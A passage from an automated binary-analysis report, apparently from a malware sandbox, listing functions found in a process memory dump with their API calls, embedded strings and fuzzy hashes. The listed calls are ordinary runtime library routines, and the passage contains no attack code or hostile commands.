                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B477D
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B47A4
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::exception::exception$Exception@8H_prologThrow___std_exception_copy
                                                                                                                                                        • String ID: ]sB$expected >$unexpected end of data
                                                                                                                                                        • API String ID: 4209301069-901249175
                                                                                                                                                        • Opcode ID: 598e27828e8df34971bd97bc27fd9d6a69d74b7023616a4b54635af4391f879d
                                                                                                                                                        • Instruction ID: da855da76143e28ba7433a8049fd60b6928f193c4c67aaf5b560c218fc8497c2
                                                                                                                                                        • Opcode Fuzzy Hash: 598e27828e8df34971bd97bc27fd9d6a69d74b7023616a4b54635af4391f879d
                                                                                                                                                        • Instruction Fuzzy Hash: FC41AE709042459FCB10DF69C1546ADBBF4EF5A314F2480AEE895AB342C7799E02CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00696A20, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,?), ref: 00696A40
                                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?), ref: 00696A52
                                                                                                                                                        • swprintf.LIBCMT ref: 00696A73
                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?), ref: 00696AB0
                                                                                                                                                        • _abort.LIBCMT ref: 00696ACB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConsoleFileHandleTypeWrite_abortswprintf
                                                                                                                                                        • String ID: )K7~$Assertion failed: %Ts, file %Ts, line %d
                                                                                                                                                        • API String ID: 2465388337-1845690379
                                                                                                                                                        • Opcode ID: f76e312c8cdb94d20c803e1ff69e5230eaf54aa276ebda209e078d1a651b8dc4
                                                                                                                                                        • Instruction ID: 7b4362013b528318d88b3fa74f026294002c6185fa33420ff9a6dd92d098de14
                                                                                                                                                        • Opcode Fuzzy Hash: f76e312c8cdb94d20c803e1ff69e5230eaf54aa276ebda209e078d1a651b8dc4
                                                                                                                                                        • Instruction Fuzzy Hash: 28112B719012186BCF20DB28CC45DEFB7BEEF45310F50865AFE16A7681EA309E468B54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0069B57D, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 38libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0069B572,00000003,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002), ref: 0069B59D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0069B5B0
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0069B572,00000003,?,0069B512,00000003,0077A770,0000000C,0069B625,00000003,00000002,00000000), ref: 0069B5D3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                        • String ID: )K7~$0A$CorExitProcess$mscoree.dll
                                                                                                                                                        • API String ID: 4061214504-3383225941
                                                                                                                                                        • Opcode ID: 1d8492c93ad1afce7cf1077919ba3eb13c5f2ef1e74f51257d4c64a4f288579a
                                                                                                                                                        • Instruction ID: 8f9a08d19e7d12af9ac58180676ec6b36c3c64f505fd524b5156d0c0ac1629b2
                                                                                                                                                        • Opcode Fuzzy Hash: 1d8492c93ad1afce7cf1077919ba3eb13c5f2ef1e74f51257d4c64a4f288579a
                                                                                                                                                        • Instruction Fuzzy Hash: 32F04470901608BBCF115F94DC49BEDBFBAEF44751F414159F806A6690DB749A44CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0056C747, Relevance: 12.2, APIs: 8, Instructions: 208COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0056C74C
                                                                                                                                                        • new.LIBCMT ref: 0056C792
                                                                                                                                                          • Part of subcall function 0056D435: __EH_prolog.LIBCMT ref: 0056D43A
                                                                                                                                                          • Part of subcall function 0056D435: _strlen.LIBCMT ref: 0056D471
                                                                                                                                                        • new.LIBCMT ref: 0056C7DC
                                                                                                                                                        • new.LIBCMT ref: 0056C830
                                                                                                                                                        • new.LIBCMT ref: 0056C87A
                                                                                                                                                        • new.LIBCMT ref: 0056C8C9
                                                                                                                                                        • new.LIBCMT ref: 0056C913
                                                                                                                                                          • Part of subcall function 00680AF7: Concurrency::cancel_current_task.LIBCPMT ref: 00680B0F
                                                                                                                                                          • Part of subcall function 005701FF: __EH_prolog.LIBCMT ref: 00570204
                                                                                                                                                          • Part of subcall function 005701FF: _strlen.LIBCMT ref: 00570226
                                                                                                                                                        • new.LIBCMT ref: 0056C95F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen$Concurrency::cancel_current_task
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 194979272-0
                                                                                                                                                        • Opcode ID: 5cec0c765228ae5f0f4d02430d0f3a6a238138c76bae73fe1ae54e8dc0183e56
                                                                                                                                                        • Instruction ID: 14ffb8582634386fc82cf17da935bcf3b292f996a25e992b78d83ec25e0b9b1c
                                                                                                                                                        • Opcode Fuzzy Hash: 5cec0c765228ae5f0f4d02430d0f3a6a238138c76bae73fe1ae54e8dc0183e56
                                                                                                                                                        • Instruction Fuzzy Hash: C1818D70D4534ADECB45EFB889156EDBFB4BF55300F1484AEE240AB282DB748A04DBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004195D1, Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 452networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004195D5
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004195E0
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 0041961B
                                                                                                                                                          • Part of subcall function 00415811: __EH_prolog.LIBCMT ref: 00415816
                                                                                                                                                          • Part of subcall function 00415811: new.LIBCMT ref: 00415828
                                                                                                                                                          • Part of subcall function 00415811: new.LIBCMT ref: 00415866
                                                                                                                                                          • Part of subcall function 00416FC2: htons.WS2_32(?), ref: 00416FFA
                                                                                                                                                          • Part of subcall function 00416FC2: htonl.WS2_32(00000000), ref: 00417011
                                                                                                                                                          • Part of subcall function 00416FC2: htonl.WS2_32(00000000), ref: 00417018
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prologhtonl$ExceptionException@8RaiseThrowgethostbynamehtons
                                                                                                                                                        • String ID: <$Q$q
                                                                                                                                                        • API String ID: 2841390951-909606520
                                                                                                                                                        • Opcode ID: eeff312ed604f085607603ca81c452021e4206bf864764dc0e6651c6ff7d6923
                                                                                                                                                        • Instruction ID: f70e34699a2ffa5ce388f824ed4b99f1f730ff4a9cab42418cb218840e06cff6
                                                                                                                                                        • Opcode Fuzzy Hash: eeff312ed604f085607603ca81c452021e4206bf864764dc0e6651c6ff7d6923
                                                                                                                                                        • Instruction Fuzzy Hash: 4502907180025CEADB15DFA8DC51BEEB7B8BF15304F1041AEE505A7191EB786F88CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00419130, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 323networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00419134
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041913F
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00419173
                                                                                                                                                        • _strlen.LIBCMT ref: 00419288
                                                                                                                                                          • Part of subcall function 0041D1F6: __EH_prolog.LIBCMT ref: 0041D1FB
                                                                                                                                                          • Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9
                                                                                                                                                          • Part of subcall function 0041D156: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D1BB
                                                                                                                                                          • Part of subcall function 00416578: __EH_prolog.LIBCMT ref: 0041657D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrd_sleepThrowUnothrow_t@std@@@__ehfuncinfo$??2@_strlengethostbyname
                                                                                                                                                        • String ID: .$b
                                                                                                                                                        • API String ID: 3595494107-2680574762
                                                                                                                                                        • Opcode ID: e74088a9f7ab51d36eb092ab58e917829bb1efb67172af908baee427be1af0ed
                                                                                                                                                        • Instruction ID: 99e4a221101cd6e4a68c917da74a03fb218fcc0a0d34ab36574a5b4331b5d08c
                                                                                                                                                        • Opcode Fuzzy Hash: e74088a9f7ab51d36eb092ab58e917829bb1efb67172af908baee427be1af0ed
                                                                                                                                                        • Instruction Fuzzy Hash: 16D1B27180425CEEDB15EBA4DC85BEEB7B8FF14304F1041AEE509A6091EB785F88CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041A7D2, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 225COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A7D6
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041A7E1
                                                                                                                                                          • Part of subcall function 0041D2CE: __EH_prolog.LIBCMT ref: 0041D2D3
                                                                                                                                                          • Part of subcall function 00478772: __EH_prolog.LIBCMT ref: 00478777
                                                                                                                                                          • Part of subcall function 00478772: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00478826
                                                                                                                                                          • Part of subcall function 00478772: GetProcAddress.KERNEL32(00000000), ref: 0047882D
                                                                                                                                                          • Part of subcall function 00414332: std::_Throw_Cpp_error.LIBCPMT ref: 0041433D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
                                                                                                                                                        • String ID: K$T-x$q$|,x
                                                                                                                                                        • API String ID: 3644655947-130662654
                                                                                                                                                        • Opcode ID: 361d7832ae8e6a77b56341ce8916438330d7cac7d6e6bc3cc0dd8a0336b400b9
                                                                                                                                                        • Instruction ID: 5c569cf4fd579674ecb52f27345813c34445597b6c220660fb418753f6a1aa45
                                                                                                                                                        • Opcode Fuzzy Hash: 361d7832ae8e6a77b56341ce8916438330d7cac7d6e6bc3cc0dd8a0336b400b9
                                                                                                                                                        • Instruction Fuzzy Hash: 7381B371D0024CAEDB10DFA9DC41BEDBBB8EF15304F10426FF505A61A2EBB85A85CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00693A92, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 0-2802557318
                                                                                                                                                        • Opcode ID: 52048ab17d6f23fb2466876576d5e4ef559e7931fc4e039c35f9bba20833728e
                                                                                                                                                        • Instruction ID: 3d0fb1ce620077e56f4f7a15449c3dd8af87b35fe6a182fdba52835ecc8d530d
                                                                                                                                                        • Opcode Fuzzy Hash: 52048ab17d6f23fb2466876576d5e4ef559e7931fc4e039c35f9bba20833728e
                                                                                                                                                        • Instruction Fuzzy Hash: F9716C35901636DBCF219B59C884AFEBB7EEF55360B24422AE811A7B81D7708E45C7A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004291BB, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 215COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004291BF
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004291CA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                                                                        • String ID: t4x$t4x
                                                                                                                                                        • API String ID: 1681477883-1247688687
                                                                                                                                                        • Opcode ID: ae9e9924fadb97abfd398ed7fbf18a08cb54edac760dde69480a52a2666e6f23
                                                                                                                                                        • Instruction ID: 762b2b96d21b1a5a65d5c130f2bb551cb97727d37462daceea88c11a0b5ac995
                                                                                                                                                        • Opcode Fuzzy Hash: ae9e9924fadb97abfd398ed7fbf18a08cb54edac760dde69480a52a2666e6f23
                                                                                                                                                        • Instruction Fuzzy Hash: 9681BF70900108AFDB18EFE5D985AFEBBB8EF44304F10856EF151A7291DB785E46CB68
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0049F6A5, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 178COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0049F6AA
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 0049F84F
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049F877
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 0049F898
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::exception::exception$Exception@8H_prologThrow
                                                                                                                                                        • String ID: bad conversion$>A
                                                                                                                                                        • API String ID: 1448338827-413851156
                                                                                                                                                        • Opcode ID: b4e55a3c1b912fc13ac35863516acfa502901178e2089e75b760ff2a553ebe8c
                                                                                                                                                        • Instruction ID: ed9149be649446b85251c730fe4e238d0b5628cbffe1d46de8d989f479908c9e
                                                                                                                                                        • Opcode Fuzzy Hash: b4e55a3c1b912fc13ac35863516acfa502901178e2089e75b760ff2a553ebe8c
                                                                                                                                                        • Instruction Fuzzy Hash: 796127B1900248EFDF10DFA9C885AEEBFB4BF18308F14446EE545E7242D774AA49CB65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0051E5BE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 106COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • cvRegisterModule, xrefs: 0051E695
                                                                                                                                                        • module != 0 && module->name != 0 && module->version != 0, xrefs: 0051E6A6
                                                                                                                                                        • $&x, xrefs: 0051E60E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog
                                                                                                                                                        • String ID: $&x$cvRegisterModule$module != 0 && module->name != 0 && module->version != 0
                                                                                                                                                        • API String ID: 1011152186-1447339402
                                                                                                                                                        • Opcode ID: b6ecbd2e245c52d87adcc449686f96ba77382eeaee26d8779ad188d4c4c1b856
                                                                                                                                                        • Instruction ID: 7ba626a401bceaca904931e49201bae3fb8da8dff47e98529f55d73be2fbcfda
                                                                                                                                                        • Opcode Fuzzy Hash: b6ecbd2e245c52d87adcc449686f96ba77382eeaee26d8779ad188d4c4c1b856
                                                                                                                                                        • Instruction Fuzzy Hash: 2E3127B29002089FEB19DFA8DC51BEEBBF5EB14300F10812EE802D7552E7789985CB54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004AB0A0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004AB0A5
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004AB164
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004AB191
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8H_prologThrowstd::exception::exception
                                                                                                                                                        • String ID: ]sB$expected <$text
                                                                                                                                                        • API String ID: 1340123063-2654176306
                                                                                                                                                        • Opcode ID: 634ac965015f2931497bd25128e59a060a8e6af0b7036ca5ebd2cf5bc5686785
                                                                                                                                                        • Instruction ID: 78cb5fb5e912ca49d5a2d2385afa47c100d33730436c0ef76d036eb01693bc97
                                                                                                                                                        • Opcode Fuzzy Hash: 634ac965015f2931497bd25128e59a060a8e6af0b7036ca5ebd2cf5bc5686785
                                                                                                                                                        • Instruction Fuzzy Hash: 6C31C771E003099BDB10DF69C4506AABBB4FF263A0F04826FE8949B783D378D9418BC4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004B19B5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004B19BA
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004B1A54
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B1A26
                                                                                                                                                          • Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358
                                                                                                                                                        • std::exception::exception.LIBCONCRT ref: 004B1A63
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::exception::exception$ExceptionException@8H_prologRaiseThrow___std_exception_copy
                                                                                                                                                        • String ID: ]sB$unexpected end of data
                                                                                                                                                        • API String ID: 4183761955-1396046059
                                                                                                                                                        • Opcode ID: c6d15faaa86d848d583d73a550a0b10915402563c7f48320aa408ff538b2cdc4
                                                                                                                                                        • Instruction ID: da3deb847f2bd80c10def2c0f67ea457f459e055d0673e9863bf34604f824adb
                                                                                                                                                        • Opcode Fuzzy Hash: c6d15faaa86d848d583d73a550a0b10915402563c7f48320aa408ff538b2cdc4
                                                                                                                                                        • Instruction Fuzzy Hash: 8A2126B0C01245DFCB10CFA4C5253EEBBB5FF09304FA4815AD4426B2A1D77D1A06CBA9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00686DCC, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00686DC3,0068621D,0057A3EE,0000000C,0057A6D1,?,?,?,?,00413D98,?,?), ref: 00686DDA
                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00686DE8
                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00686E01
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00686DC3,0068621D,0057A3EE,0000000C,0057A6D1,?,?,?,?,00413D98,?,?), ref: 00686E53
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                        • Opcode ID: 49196f5ed8c68660eb60289db98353ed1651f020db792ff8488a7a91f7e6e984
                                                                                                                                                        • Instruction ID: 67422ed5cd767d745e04199a70cfd03c93b2b10cc3f009a43a1dabd45992a5cc
                                                                                                                                                        • Opcode Fuzzy Hash: 49196f5ed8c68660eb60289db98353ed1651f020db792ff8488a7a91f7e6e984
                                                                                                                                                        • Instruction Fuzzy Hash: 8C01F13628D7115EE7603775EE8A95A278AFB007B9730432EF520842E0EE914C125398
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00422B03, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00422B08
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00422B2E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Exception@8H_prologThrow
                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$z,B
                                                                                                                                                        • API String ID: 3222999186-1719427159
                                                                                                                                                        • Opcode ID: f1897247435d3e105d3733559e05750925c2ae089210548edb9544d07b35a23d
                                                                                                                                                        • Instruction ID: b7364e5dacc069af7ceca0022a19109a51f3ce4e5cecb01bc097d3acd7cbf9c0
                                                                                                                                                        • Opcode Fuzzy Hash: f1897247435d3e105d3733559e05750925c2ae089210548edb9544d07b35a23d
                                                                                                                                                        • Instruction Fuzzy Hash: 9711C6B1A00218BEEB00EF94D917BEE7B74EB10704F50414EF9016A1D2D7FD5A55CB9A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0057E08A, Relevance: 10.6, APIs: 7, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 0057E091
                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0057E09B
                                                                                                                                                          • Part of subcall function 004214CA: __EH_prolog.LIBCMT ref: 004214CF
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::_Lockit.LIBCPMT ref: 004214E3
                                                                                                                                                          • Part of subcall function 004214CA: std::_Lockit::~_Lockit.LIBCPMT ref: 00421503
                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0057E0BB
                                                                                                                                                        • ctype.LIBCPMT ref: 0057E0D5
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0057E0F2
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0057E111
                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0057E11A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowctypestd::locale::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 189735510-0
                                                                                                                                                        • Opcode ID: bff3102cd36f89475c7076a14a4253b765cebc1db8b479a6b9190f7bd35a292b
                                                                                                                                                        • Instruction ID: f57723cdd7172e852cf687167f79176c06b65abf4b602d9e0d194f0e3e938d87
